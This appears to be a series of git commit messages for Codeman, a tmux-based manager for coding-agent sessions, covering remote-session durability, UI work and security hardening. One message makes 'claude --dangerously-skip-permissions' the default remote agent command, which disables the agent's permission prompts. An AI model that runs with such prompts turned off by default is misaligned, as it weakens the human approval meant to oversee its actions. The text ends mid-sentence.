(cherry picked from commit f321e1200a9a7c1e58c69ba936b680200fd53275)
Two Codeman clients attaching the same durable remote tmux session at different
viewports would fight: tmux sizes a window to the SMALLEST attached client by
default. Push `window-size latest` to the remote session config so the window
tracks the most-recently-active client instead, letting concurrent clients
coexist; surface the client count for a "shared · N" badge.
Reconciled onto upstream PR #145: #145 moved the durable remote session onto the
dedicated `-L codeman-remote` socket under a `codeman-ssh-` name and scoped every
tmux set-option PER-SESSION (`set -t <name>`, never `-g`) so a shared remote tmux
server's OTHER sessions keep their own prefix/mouse/sizing. The original COD-106
commit added `set -g window-size latest` (GLOBAL) on the old `-L codeman` socket —
a regression against #145's hardening. This commit layers the window-size feature
onto #145's structure as `set -t <name> window-size latest` (per-session, on the
codeman-remote socket). Test assertions updated to the per-session form
(remote-shared-sessions.test.ts) and the byte-identical launch-command test
(remote-ssh-options.test.ts) extended with the window-size line — which supersedes
the separate f09323c9 assertion fix (dropped: it targeted the global form and also
carried unrelated CLAUDE.md doc changes).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Continuous remote-only reconnect watcher closing the COD-104 durability
arc: when a remote session's local ssh pane dies mid-run, re-establish it
automatically instead of leaving a dead pane until the user pokes it.
Design decisions (per cod108 design doc):
- D1 event->owner: TmuxManager watcher DETECTS a dead remote pane and emits
`remoteSessionDropped`; the session owner (server) reassembles the same
RespawnPaneOptions and calls Session.reattachRemote() -> respawnPane, which
re-runs the idempotent remote command (owned new-session -A / non-owned
attach) and REJOINS the still-running durable remote tmux session. The
watcher never reassembles options itself, and never routes through the
Claude-idle respawn-controller.
- D2 bounded backoff: per-session exponential backoff [5s,15s,45s,2m,5m,5m],
reset on a successful reattach, `remoteReconnectExhausted` emitted once after
the cap. Pure, unit-tested schedule + eligibility decision.
- D3 always-on + kill-switch: `remoteAutoReconnect` app setting (default ON),
read each tick; when false the watcher does nothing.
Guards: killSession() (incl. the non-owned DETACH early-return) and shutdown
add the session to an intentional-teardown guard set + clear its backoff
BEFORE teardown, so a closed/killed tab is never auto-revived. Exactly one
reconnect in flight per session (inFlight guard prevents stacked respawns).
Per-session reconnect/guard state cleared on session removal.
New: src/remote-reconnect.ts (pure backoff + decideReconnect), TmuxManager
startRemoteReconnectWatcher/stop + runRemoteReconnectTick + noteRemoteReconnect
+ guardRemoteReconnect + clearRemoteReconnectState; Session.reattachRemote()
(+ extracted _buildRespawnPaneOptions, shared with interactive start); server
wiring + watcher start; 3 SSE events (sse-events.ts + constants.js in sync,
broadcast + app.js exhausted "Reconnect" affordance); remoteAutoReconnect
schema + settings-ui toggle.
Tests: test/remote-auto-reconnect.test.ts (21) - pure schedule, eligibility
(guarded never reconnects, non-remote/pane-alive/not-due skip, over-cap
exhaust), and manager-level integration (dead remote pane -> dropped ->
backoff -> exhausted; guarded emits nothing; reset-on-success; kill-switch
off; state-cleared-on-remove). Verified real-remote against aa-desktop: drop
local ssh pane -> watcher emitted -> respawnPane reattached the SAME remote
session (remote pane_pid unchanged 3939->3939); test session cleaned up, the
real host sessions left untouched.
Checks: tsc, eslint, check:frontend-syntax, check:public-assets, prettier
--check, build all green; tmux-manager/session-routes/session-manager/
sse-registry-parity suites pass.
(cherry picked from commit d13d58b1994eb6594fd2eadea208104d36204f9d)
Since COD-104 a remote session lives in a durable tmux server on the host and
outlives the local pane, so killing a tab only DETACHED — even for sessions we
own. Propagate `kill-session` to the remote for OWNED sessions in killSession's
owned path (after COD-105's non-owned detach-only early-return); non-owned
detach-only is untouched.
Reconciled onto upstream PR #145: #145 already upstreamed this exact owned-kill
propagation as `buildRemoteKillCommand({ remote, sessionId })` on the dedicated
`-L codeman-remote` socket (matching buildRemoteLaunchCommand) and wired it into
killSession (Strategy 3b, owned-only, fire-and-forget). The original COD-109
commit added a second `buildRemoteKillCommand(remote, name)` overload on the old
`-L codeman` socket plus a duplicate kill block — a compile error AND a wrong
socket post-#145 (owned sessions no longer live on `codeman`). This commit keeps
#145's socket-correct implementation and drops the duplicate; the required
test/remote-kill-command.test.ts is retargeted to #145's `{ remote, sessionId }`
signature and the `codeman-remote` socket.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Phase 2 of the remote-tmux arc. Discover codeman-* tmux sessions already
running on a remote host (created by the remote's own Codeman or another
instance) and attach to one this Codeman didn't launch, with detach-not-kill
ownership for non-owned sessions.
- remote-hosts.ts: listRemoteCodemanSessions (ssh, VITEST-guarded, never throws)
+ pure parseRemoteSessionList + buildRemoteListSessionsCommand. Parser splits
on the LITERAL \t the remote tmux emits (next-3.7 does not expand \t) AND a
real tab. toAttachedSessionRemote builds a non-owned SessionRemote; toSessionRemote
now marks the COD-104 launch path owned:true.
- tmux-manager.ts: buildRemoteAttachCommand (sibling of buildRemoteLaunchCommand);
buildRemoteSessionCommand selects attach vs launch by ownership. killSession gains
a detach-not-kill early return for non-owned remote sessions: tears down only the
LOCAL pane (kills local ssh -> remote attach detaches), NEVER issues a remote
kill-session.
- types/session.ts: RemoteSessionInfo; SessionRemote.owned + remoteSessionName.
- schemas.ts: CreateSessionSchema.attachRemoteSession {hostId, remoteSessionName};
fixed a pre-existing no-useless-escape lint error in the jumpHost regex.
- case-routes.ts: GET /api/remote-hosts/:hostId/sessions (explicit discovery).
- session-routes.ts: attachRemoteSession create path -> non-owned session.
- UI (index.html/session-ui.js/styles.css): explicit "Discover existing sessions"
button + Attach action (owned:false). No auto-discover.
Verified on aa-desktop: discovered codeman-disco1, attached (attached=1, shared
view), killed local probe pane -> remote SURVIVED_DETACH (attached=0). Tests:
parse/attach-cmd/ownership unit + discovery route, session-routes + case-routes green.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
(cherry picked from commit 55f5ada9db6d01518a4adf6b752e460b5df39524)
COD-104 wired checkRemoteTmuxAvailable into the remote-session create path,
but it does a real `ssh` via exec — so 2 remote-create tests in
session-routes.test.ts hit a ~10s ssh timeout and failed (422). Mirror
TmuxManager's IS_TEST_MODE no-op-shell-under-VITEST: short-circuit the live
probe to {ok:true} under vitest. Command construction stays covered by
buildRemoteTmuxCheckCommand unit tests. session-routes.test.ts now 61/61.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
(cherry picked from commit 6ae2c0b8160090a1f0f6b32a3fe8496d402ac2c6)
Release 1.3.5. Consumes the changeset from PR #155: re-issue the
codeman_session cookie on every authenticated request so the browser cookie
lifetime tracks the server-side sliding TTL, fixing the recurring native Basic
Auth dialog during active use.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
screenshots-readme/, screenshots-readme-real/, screenshots-real/ and
design-explorations/ are local capture scratch that was untracked but not
ignored, so an unqualified `git add -A` during a COM could sweep them into a
release (this has happened before).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Re-issue the codeman_session cookie on every authenticated request so the browser cookie lifetime tracks the server-side sliding TTL (authSessions already used refreshOnGet: true). Fixes the recurring native Basic Auth dialog during active use.
Reviewed: no token rotation (same server-generated token re-issued, so no fixation vector), forged cookies are not blessed, logout still emits only the clearing cookie and server-side invalidation holds, cookie attributes identical to the Basic Auth path. Verified against the merge result: tsc --noEmit, lint, format:check, check:frontend-syntax, check:lockfile, and npm run test:ci (3404 passed) all green.
Deterministic claude --version probe seeds cliVersion so wheel-forwarding
to Claude's transcript engages (banner scrape was unreliable on 2.1.187+
and resumed sessions). Shift+wheel reads the dominant axis so a trackpad's
horizontal Shift-scroll reaches local scrollback. New per-device
"Wheel Scrolls Local History" opt-out. Wheel reports use a fire-and-forget
send path so they no longer flicker the pending-bytes indicator.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Make the Cron Jobs modal skin-aware + consistent with App Settings:
skin-variable selects (appearance:none, --bg-input fill, custom chevron),
color-scheme:dark for native controls, themed date/time inputs, and
btn-toolbar-sized toolbar/footer buttons. Bumps aicodeman to 1.3.2.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Redesign the Cron Jobs modal to match App Settings styling + fix the
create form never collapsing (scoped #cronModal .hidden rule). Bumps
aicodeman to 1.3.1.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- Hide the new btn-session-manager header button on phones: add it to the
@media (max-width: 430px) display:none block in mobile.css (next to
.btn-away-digest) and to KNOWN_PHONE_HIDDEN in the mobile-header policy
test, closing the recurring phone-header-leak regression that was PR
#153's red CI job.
- Put the session-manager header button on its own line in index.html
(was crammed onto the away-digest line).
- app.js: drop session:updated from the unified-list SSE refresh trigger —
it is batch-broadcast ~every 500ms per active session and would turn an
open modal / visible welcome list into a sustained ~1 Hz full projects
rescan loop; created/deleted (structural changes) are sufficient.
- terminal-ui.js _fetchUnifiedSessions: check the ApiResponse envelope and
throw on failure so a 5xx surfaces via the caller's catch instead of
rendering an empty history.
- terminal-ui.js _openSessionRowMenu: on re-entry, invoke the previous
menu's close fn (stored as _openRowMenuClose) so its document/window
listeners are detached rather than leaked; use claudeSessionId ||
sessionId in the 'Resume session' menu item to match the main-row and
Session Manager resume routing.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Resolve the 4 conflicted files toward master's merged #146 work while
keeping PR #153's genuinely-new additions:
- app.js: keep the full Escape chain (closeSessionManager +
closeCommandPalette + closeShortcutOverlay).
- index.html: keep master's Command Palette modal markup alongside the
PR's Session Manager modal + header button.
- styles.css: keep master's Command Palette + COD-157 shortcut CSS AND
the PR's COD-130 session-row kebab-menu CSS (both inserted at the same
spot — reunited each with its own closing brace).
- terminal-ui.js: resolve _buildHistoryItem's main-row click handler to
master's options.onActivate contract with a liveness + claudeSessionId
-aware resume default, preserving the PR's two-shape/badges/kebab body.
- panels-ui.js: the PR's pre-#146 Session Manager block auto-merged as a
duplicate AFTER master's fixed block (last-key-wins regression) — drop
it, keep master's implementation plus the PR's new
_onSessionListMaybeChanged.
Backend projectKey plumbing and the SSE live-refresh listeners in app.js
merge additively and are kept as-is.
Includes review fixes: full route-test coverage for the rollout locator/parser (originator/uuid/pin resolution, dedup, injected-context filtering), LRU caches, multi-block text joins.
# Conflicts:
# src/web/routes/session-routes.ts
Includes review fixes: real _wsState lifecycle (connecting/connected/disconnected), per-tab supersede identity (multi-tab coexistence), preserved reconnect backoff, connection-dot CSS for connected/fallback states.
Includes review fixes: explicit ?full=1 trigger wired from initial page load, capture maxBuffer sized from config with -S line bound, capture returned alone (no byte-buffer duplication), early byte-cap before normalization.
- help-modal extractor bounds at the next HTML comment (cron modal's 'Run At'
text false-positived the stale-shortcut regex)
- remote-shell run test expects the wired /api/quick-start path (#145) — POST
/api/sessions has no caseName in its schema
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Includes review fixes: Session Manager aligned to the merged /api/sessions/unified contract with error states, Ctrl+K no longer leaks 0x0B into the PTY, shortcut registry finished (dispatch/persistence/rendering), shortcutOverrides preserved across settings saves, help modal kept reachable.
# Conflicts:
# README.md
# src/web/public/index.html
# src/web/public/session-ui.js
- saveAppSettings() rebuilds settings from the DOM; carry over shortcutOverrides
like showTokenCount/showCost so rebinding survives unrelated saves
- shortcut overlay footer links to the full help modal (its only opener was the
legacy Ctrl+? route this PR replaced)
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- UI: add the missing data-tab="case-remote" tab button; dispatch it through
submitCaseModal()/switchCaseModalTab() to linkRemoteCase() (was dead code).
- Restore: restoreMuxSessions() now passes remote (muxSession.remote ??
savedState.remote) into the Session constructor, so remote metadata round-trips
on restart instead of reattaching from a local cwd / respawning LOCAL / being
erased from state.json. Recovery tests added.
- Run flows: runClaude()/runShell() route remote cases through /api/quick-start
(POST /api/sessions stat-validates workingDir locally); run*() skip the
/api/*/status pre-check and omit inert config/env for remote cases.
- Quick-start: resolve the remote case BEFORE the local CLI availability gates and
skip isCodex/Gemini/OpenCodeAvailable() when remote; REJECT
envOverrides/effort/codex/gemini/openCode config for remote (they don't cross
ssh) instead of silently dropping them.
- Injection: reject $, backtick, $( in remotePath + identityFile at the schema
layer (they survive shellescape into the bash -c launch double-quote layer).
Regression tests for $(...) and backtick payloads added.
- Remote socket/name: launch on a DEDICATED -L codeman-remote socket under a
codeman-ssh-<id> name that fails a remote Codeman's SAFE_MUX_NAME_PATTERN, so a
remote instance can't adopt the session; scope tmux set-options per-session
(never -g) so they don't mutate other sessions.
- Kill: best-effort ssh 'tmux -L codeman-remote kill-session' on remote session
kill (fire-and-forget, never blocks/throws the local kill) so the remote agent
isn't orphaned forever.
- Probe: wire checkRemoteTmuxAvailable() into POST /api/quick-start (structured
OPERATION_FAILED) and as courtesy validation in remote-link; add a default
-o ConnectTimeout=10 to buildSshConnectionArgs (overridable via extraSshOptions).
- Command default: remote claude default is now
'exec claude --dangerously-skip-permissions' (per-host override stays the escape
hatch), mirroring local non-interactive semantics.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Reject multi-line prompts end-to-end: schema refines on promptText/
launchCommand, runtime check in resolvePrompt (prompt-file content;
trailing newlines tolerated), matching cron-ui form validation — delivery
is single-line only, so multi-line was silently corrupted (typed mode
fused lines, paste mode submitted partials)
- Close the workingDir confinement bypass (arbitrary server-side file read,
e.g. workingDir=/proc + /proc/self/environ): realpath-resolve workingDir
before the containment check, reject '/' and blocked/pseudo-fs trees
(/proc, /sys, /dev + the attachment-guard blocklist) at fire time AND at
job create/update (workingDir must exist and be a directory)
- Session lifecycle: new per-job autoClosePreviousSession (default true,
recurring schedules only; ignored for 'once') — the previous run's
still-open session is closed via the normal cleanupSession path when the
next run fires; UI switch added; 50-session cap math documented in
docs/cron-guide.md §8
- skip_if_same_agent_running: count only live sessions (exclude
stopped/error dead tabs), exclude sessions created by this job's own runs
(fixes the fire-once-then-skip-forever self-deadlock), and a skipped
'once' job stays armed and retries next tick instead of being consumed;
liveness filter mirrored in cron-ui _countActiveAgents
- Wire launchCommand (was accepted+documented but dead): shell mode sends
it via writeViaMux as the first input line after startShell readiness
(single-line, schema-enforced); form field shown for shell agent type
- Record delivery failures: a false writeViaMux result now fails the run
instead of recording a false 'prompt_sent'
- Cap saved jobs at MAX_CRON_JOBS (100) to bound state.json growth
- Surface field-specific schema messages (drop parseBody custom
errorMessage on cron create/update)
- Tests: workingDir create/update validation, /proc bypass regression,
single-line enforcement (schema+runtime+trailing-newline tolerance),
live/own-session skip filtering, once-skip re-arm, auto-close on/off/once,
job-count cap
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Session Manager (COD-121/192): align _loadSessionManagerList() with the
merged #139 endpoint — map UnifiedSessionItem fields (lastActivityAt
epoch-ms → lastModified, optional sizeBytes/firstPrompt/name) to the
history-record shape _buildHistoryItem renders; surface non-2xx /
error-envelope responses as a visible message instead of a silent
"No sessions found"; route clicks by liveness (live row → selectSession,
history row → resumeHistorySession by conversation UUID) via a new
onActivate option so a live session is never duplicate-resumed
- Ctrl+K double-dispatch: gate the palette chord in
attachCustomKeyEventHandler (return false on keydown) so xterm never
writes 0x0b kill-line into the PTY while the palette opens; gate is
registry-aware so a rebound/disabled palette shortcut restores normal
terminal Ctrl+K
- Shortcut registry (COD-157) finished per maintainer decision: document
keydown now dispatches through getShortcutRegistry() +
matchesShortcutEvent() (legacy SHORTCUTS table removed), honoring
per-shortcut disable and rebinds incl. the palette chord; overrides
persist via saveAppSettingsToStorage() (correct device key + cache
coherence, was orphaned 'codeman:settings'); Shortcuts tab renders on
open via switchSettingsTab hook; capture uses a persistent listener that
ignores bare modifier keydowns (combos now capturable) and requires a
Ctrl/Cmd/Alt chord; settings rows use delegated listeners instead of
inline onclick (JS-string injection sink) and overrides can no longer
clobber id/label/action; added the missing row + overlay CSS
- matchesShortcutEvent: reject undeclared extra modifiers (Ctrl+Shift+K
no longer hijacked from Firefox devtools) while keeping Ctrl/Cmd
interchangeable; match physical code OR produced key for layout parity
- Registry/dispatch gaps: added restore-terminal-size entry, documented
Ctrl+Shift+R again in the help modal (test flipped to assert presence),
Ctrl+?/Alt+? now really open the registry-driven shortcut overlay, and
Escape closes it
- Palette new-session pick routes through selectQuickStartCase() so the
searchable combobox, dir display, and lastUsedCase stay in sync
- Removed fork cherry-pick debris: dead _onSessionListMaybeChanged(),
orphaned .session-row-menu CSS, nonexistent closeMobileHeaderUtilities
calls
- Tests: functional vm-harness coverage for the unified-list field
mapping + error state + liveness routing, palette chord shift/disable/
rebind handling, override persistence round-trip, capture flow, tab
render hook, and source guards for the PTY gate + registry dispatch
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- _wsState now transitions through the full lifecycle: _connectWs() sets
'connecting', ws.onopen (inside the this._ws === ws guard) sets 'connected',
_disconnectWs() resets to 'disconnected' — the connection chip's "WS" state
was previously unreachable (stuck on "WS…"/"HTTP" forever).
- WS registry supersede is now keyed per TAB: the upgrade URL sends
cid = clientId + ':' + per-page nonce (reusing the constructor's page UUID),
while input frames keep the bare browser clientId for seq dedup — two
tabs/windows on one session coexist instead of 4010-evicting each other in a
perpetual 5s ping-pong; a genuine same-tab reconnect still supersedes.
- Exponential backoff engages: _disconnectWs() no longer zeroes
_wsReconnectAttempts (it's called at the top of _connectWs, so every retry
replanned at attempt 0 → ~0ms tight reconnect loop during outages); onopen
resets the counter on success.
- styles.css: add .connection-dot.connected (green) and .connection-dot.fallback
(yellow) — both states rendered an invisible dot (no rule existed).
- Remove smuggled dead code: resolveMonitorRowLabels/CodemanMonitorLabels
(COD-122, no consumer, referenced test doesn't exist) and the never-written
_wsLastClose/_wsInputSendCount/_httpFallbackSendCount diagnostics.
- Tests: new test/ws-state-lifecycle.test.ts drives the REAL
_connectWs/onopen/onclose/timer cycle (state transitions, escalating backoff
delays, composite cid on the upgrade URL); registry two-tab coexistence test;
static check that every emitted connection-dot class has a styles.css rule.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Replace the 'missing ?tail means reload' overload with an explicit ?full=1
query param: the frontend's first buffer load after a page load (selectSession)
now requests full=1, tab switches keep ?tail=, and the legacy no-param callers
(response-viewer fallback, clearTerminal refresh) keep the cheap visible-frame
path — the COD-47 feature was previously unreachable from a real reload.
- When the full-history capture succeeds, return it ALONE instead of prepending
the byte buffer + \x1b[H\x1b[2J: the capture is the rendered superset of the
byte history, and ED2 clears only the viewport so the concat replayed the whole
conversation twice in xterm scrollback. The history+clear+frame concat stays
for the visible-frame/tab-switch path.
- Pass an explicit execSync maxBuffer for the full-history capture (configured
terminalBufferMaxBytes + slack) — the 1MB Node default ENOBUFS-killed exactly
the multi-MB captures the feature exists for; log ENOBUFS concisely instead of
dumping the truncated stdout.
- Bound the capture itself via -S -<N> derived from the configured tmux
history limit (was unbounded -S -), and add -J so lines hard-wrapped at the
capture-time pane width reflow in the browser xterm.
- Cap the concatenated buffer to terminalBufferMaxBytes EARLY (before the
regex normalization passes) so multi-MB captures don't stall the event loop
normalizing bytes that get sliced away.
- Tests: route tests updated for ?full=1 semantics (capture-alone response,
config-forwarded capture bounds, byte-history fallback, no-param requests
stay on the visible-frame path); source-scan tests cover the bounded -J -S -<N>
flags and explicit maxBuffer.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Breaker reset is now explicit-only: POST /api/sessions/:id/interactive no
longer unconditionally resets the PTY-exit breaker (that endpoint IS the
frontend's automatic re-attach path, so the breaker could never trip on the
COD-115 crash loop and any tab click silently re-armed it). The route accepts
a schema-validated optional body flag {clearBreaker:true}
(InteractiveStartSchema) and resets only when it is sent.
- Frontend restart control: app.js selectSession keeps the bare auto-attach
(no body, never clears); when the selected session has respawnBlocked it asks
for explicit user confirmation and only then re-POSTs with clearBreaker:true.
respawnBlocked is surfaced via SessionState/toState() (runtime-only, not
restored on boot so recovery can re-attach).
- Trip observability: WebServer.setupSessionListeners() is now idempotent
(skips while refs are attached) and the re-attach routes (/interactive,
/interactive-respawn, /shell) re-run it, restoring the wiring that the exit
handler detaches on every PTY exit — without this the 5th-exit trip had
guaranteed zero listeners (no SSE, no push, no persist, no run-summary).
- Push notification: added SessionRespawnBreakerTripped to PUSH_EVENT_MAP
('Session crash loop stopped', urgency critical) with an exit-count body
branch; previously sendPushNotifications silently no-oped.
- Minor: buildMuxAttachEnv() truecolor param is now actually passed
(codex/gemini, mirrors buildEnvExports); buildClaudeEnv() uses delete for
COLORTERM/CLAUDECODE (same node-pty "KEY=undefined" quirk as COD-115).
- Tests: route tests assert auto-reattach does NOT reset, clearBreaker resets,
invalid flag rejected, and listener re-wiring on /interactive + /shell;
real-wiring lifecycle tests (createSessionListeners/attach/detach) prove the
exit-detach gap and that re-setup keeps the 5th-exit trip observable;
PUSH_EVENT_MAP regression guard.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The per-row ⋯ in the session list was a details toggle that did nothing in
the Session Manager modal (swallowed by the modal's capture-phase
close-on-click). Replace it with a real kebab context menu.
- terminal-ui.js: ⋯ now opens _openSessionRowMenu() — a body-anchored popup
(fixed-positioned, flips/clamps to viewport, z-index above the modal) with:
Resume/Switch-to (live→select tab, closed→resume), Open folder in the file
browser (live sessions only — the browser is session-scoped), Copy path
(_copyText + toast, when workingDir present), and Show details (the old
inline prompt/path panel). Closes on outside-click / Escape / scroll / resize.
- panels-ui.js: _loadSessionManagerList scopes its modal-close to the
.history-item-main (resume) click, so the ⋯/menu no longer closes the modal.
- styles.css: .session-row-menu + .session-row-menu-item.
Verified in Chromium on an isolated beta: ⋯ opens the menu with the modal
still open; closed rows show Resume/Copy path/Show details, live rows add
Switch-to + Open folder; Show details expands inline (modal stays open),
Copy path copies the path, Resume closes the modal, Escape closes only the
menu. Gates: tsc 0, lint 0, frontend-syntax + public-asset format clean.
The complete session list now updates live as sessions change, instead of
only on open/welcome-load.
- app.js: extra SSE listeners (session:created/updated/deleted) on the same
EventSource (multiple listeners per event; existing handlers untouched;
registered via addListener so they tear down on reconnect) call
_onSessionListMaybeChanged().
- panels-ui.js: _onSessionListMaybeChanged() debounced-refreshes the Session
Manager modal when it's open and the welcome list when its overlay is
visible (no work when neither is showing). _loadSessionManagerList stores the
active query so refreshes preserve the user's search.
Verified on an isolated beta instance (Playwright): dispatching a session
event refreshes the modal while open, does NOT while closed (gated), and
refreshes the welcome list while visible. Gates: tsc 0, frontend-syntax +
public-asset format clean, build clean.
Adds a header-reachable Session Manager so the complete session list is
available mid-session, not only on the welcome screen.
- index.html: always-on header button (.btn-session-manager) + #sessionManagerModal
(mirrors the Away Digest modal) with a search box + results list.
- panels-ui.js: openSessionManager()/closeSessionManager()/_loadSessionManagerList()
— loads GET /api/sessions/unified (limit 200), renders via the unit-2
_buildHistoryItem (rich items, mode/LIVE badges, open->select / closed->resume),
debounced search wired to the endpoint's q= param, empty/error states. A
modal-scoped Escape listener closes it even when focus is in the search input;
backdrop click and item click also close it.
- app.js: closeSessionManager() added to the global Escape chain.
- styles.css: modal + list styling (items reuse .history-item).
Verified on an isolated beta instance (Playwright): the header button opens the
modal, it lists 200 sessions from /api/sessions/unified, a no-match query issues
?q= to the server and yields 0 items, clearing restores the list, clicking an
item closes the modal and routes resume/select, and Escape closes it. Gates:
tsc 0, lint 0, frontend-syntax + public-asset format clean, 17 tests pass.
Backs the welcome-screen "Resume Conversation" list with the new
GET /api/sessions/unified endpoint instead of /api/history/sessions, so it
shows the COMPLETE set (live + persisted + non-Claude + closed history)
newest-first with richer context, rather than only Claude transcripts.
- terminal-ui.js: new _fetchUnifiedSessions(); loadHistorySessions() now uses
it. _buildHistoryItem upgraded to the unified shape (kept backward-compatible
with the folder-modal's old shape): title = name || firstPrompt || dir; a
mode badge + a LIVE badge (sources includes 'live'); timestamp from
lastActivityAt (falls back to lastModified); size only when present; detail
panel + "View all in this folder" preserved (gated on projectKey). Resume
branches: an open live session selects its tab, a closed one resumes.
- unified-session-service.ts + endpoint: pass projectKey through the history
source so the folder drill-down survives.
- styles.css: .history-item-badges / -badge / -badge-live pills.
Verified: tsc 0, lint 0, frontend-syntax + public-asset format clean, service
tests 13/13 (+projectKey), route tests 4/4. Playwright on an isolated beta:
the welcome list renders real items from /api/sessions/unified, and the
renderer produces the tab-name title + codex mode badge + visible LIVE badge,
omits LIVE on closed items, keeps "View all in folder", and routes resume
correctly (open->select tab, closed->resume). Persistent panel + live SSE
status are later units.
- Event-loop blockage: HEIC decode/encode (CPU-synchronous libheif WASM +
jpeg-js) now runs in a per-conversion worker_threads Worker
(src/web/heic-jpeg-worker.ts, spawned by heic-jpeg-converter.ts) with
resourceLimits and a 30s hard timeout that terminates the worker —
verified end-to-end under tsx and against compiled dist/ output with a
real iPhone HEIC (event-loop max stall 52ms during conversion).
- No server-side concurrency cap: conversions now acquire a slot from the
existing global runWithConversionLimit() pool (document-conversion-limiter),
bounding peak decode memory/CPU across simultaneous uploads.
- Decompression bomb: header-declared dimensions are read via heic-decode's
allocation-free `.all` path and rejected above 64MP BEFORE decode() can
allocate width*height*4 bytes (a <300-byte crafted file can declare
30000x30000 = 3.6GB). Regression-tested with a crafted ISOBMFF fixture
against the real heic-decode WASM (test/heic-jpeg-core.test.ts).
- Mislabeled HEIC (documented Android/MIUI case): conversion now routes on
ftyp magic-byte sniff of the raw buffer regardless of declared
ext/Content-Type, so a HEIF uploaded as image/jpeg converts instead of
415ing; the magic-mismatch 415 only fires for genuinely unrecognized bytes.
- Brand allowlist narrowed to what heic-decode's isHeic() accepts
(heim/heis/hevm/hevs dropped — they could only ever fail conversion).
- Converted-output size: the JPEG result is checked against
MAX_PASTE_IMAGE_BYTES (jpeg-js can inflate a within-limit HEIC past the cap).
- Deps: heic-convert replaced with its underlying heic-decode + jpeg-js
(the wrapper could not expose the pre-decode dimension check); lockfile
synced, drops pngjs.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Pass the attachment request `source` through the server deps lambda and make
it a required param on SessionListenerDeps.registerAttachment + the wiring
event type (the 2-arg lambda silently dropped `source`, force-confining every
codex-generated artifact — the feature never worked outside the workspace);
new test/session-listener-wiring.test.ts asserts the pass-through
- Gate the Codex `Saved to: file://` scanner on mode === 'codex' via a
codexArtifacts option threaded from the session call site; magic links stay
mode-agnostic; tests assert claude/shell sessions never emit codex-generated
requests
- Decide the generated-artifact trust policy on the realpath-RESOLVED path
(unresolvable → force-confined) and anchor the ~/.codex marker dirs to
os.homedir() prefixes with startsWith instead of substring matching; symlink
escape + unanchored-marker regression tests added
- Run the Codex scanner on stripAnsi'd data so trailing SGR sequences don't
ride into the captured URL; styled 'Saved to:' test added
- Extend generateFirstPageThumbnail with jpg/jpeg/gif/webp passthrough and
per-extension content types (mirrors the png passthrough) so the PR's new
image formats render real thumbnails instead of 204 letter-tiles
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- Add test/routes/session-routes-codex-last-response.test.ts (app.inject +
temp CODEX_HOME fixture rollouts): originator match beats cwd fallback when
two panes share a dir, cwd fallback excludes sibling-claimed/foreign-cwd
rollouts, resume-uuid filename match, history.jsonl pin outranks originator,
event_msg/legacy user-turn dedup keeps old-codex turns, injected-context
filtering, image placeholder, envelope shape ({success:true,data:{text,
timestamp[,messages]}}), and a Claude-mode regression guard (codex reader
never consulted for claude sessions)
- Replace clear-at-cap Map caches (codexHistoryPinCache, codexRolloutMetaCache)
with the repo-standard LRUMap so a full cache wipe can't thrash hot entries
on large rollout collections
- Join multi-block assistant/user text with a blank line instead of no
separator (extractCodexBlockText)
- Re-enable the terminal-buffer eye fallback for shell sessions (they have no
transcript source at all); TUI modes keep the clear placeholder
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- 92vh on iOS Safari measures the large viewport; with browser chrome visible the
panel top (header + close button) clipped off-screen. 88vh fallback + 92dvh
matches the repo's established dvh idiom.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- saveAppSettings no longer sends webglRendererEnabled on the settings PUT:
the key is absent from the .strict() SettingsUpdateSchema, so every save
400'd with INVALID_INPUT, silently killing all server-side settings
persistence. Stripped in the per-device destructure alongside
localEchoEnabled/skin/etc.
- shouldSkipWebGL now treats a stored true like the untouched default w.r.t.
the sticky marker: the checkbox defaults checked on desktop, so any
unrelated save stored true and every page load then cleared the
'codeman-webgl-disabled' marker, permanently defeating the GPU-stall
auto-fallback. Only ?webgl=force clears the marker at init.
- The marker is instead retired on a real OFF->ON toggle flip detected at
save time (mirrors the _prevGestureEnabled pattern in settings-ui.js).
- webglRendererEnabled added to the displayKeys per-device set in
loadAppSettingsFromServer (renderer choice is device/GPU-specific; syncing
would leak mobile's hidden-checkbox false onto desktop).
- Tests: stored true + sticky marker -> still skips WebGL; OFF->ON save
clears the marker and keeps the key off the wire; default-checked save
leaves the marker alone; ?webgl=force / ?nowebgl behavior unchanged.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- BLOCKER (privacy): the CJK diagnostic trace logged typed CONTENT — _esc(e.key)
per keystroke, up to 24 chars of textarea value on focus/blur/compstart/
compend/input, and the flushed text — mirrored into _crashDiag, which
persists to localStorage and beacons to POST /api/crash-diag. Traces are now
content-free: key CLASS via _kdesc (any single code point → 'printable',
named keys pass through), value lengths + phantom presence via _vdesc
(len=N[+ph]), and 'flush send len=N'. _esc removed.
- MAJOR: the onData self-heal refocused the CJK field whenever gated data
arrived with focus elsewhere — but onData also fires for xterm's
SELF-GENERATED query replies (DA/DSR/CPR/OSC during Ink redraws), so it
stole focus from rename/search/settings inputs while output streamed. Now
requires document.activeElement === this.terminal.textarea (genuine typed
input) and bails when shouldSuppressTerminalQueryResponse(data) matches.
- MAJOR: the pointerdown blur→setTimeout(focus,0) wedged-IME recovery ran on
ALL platforms; on iOS tapping the focused empty field is normal and the
async refocus is outside the user-gesture stack. The listener is now only
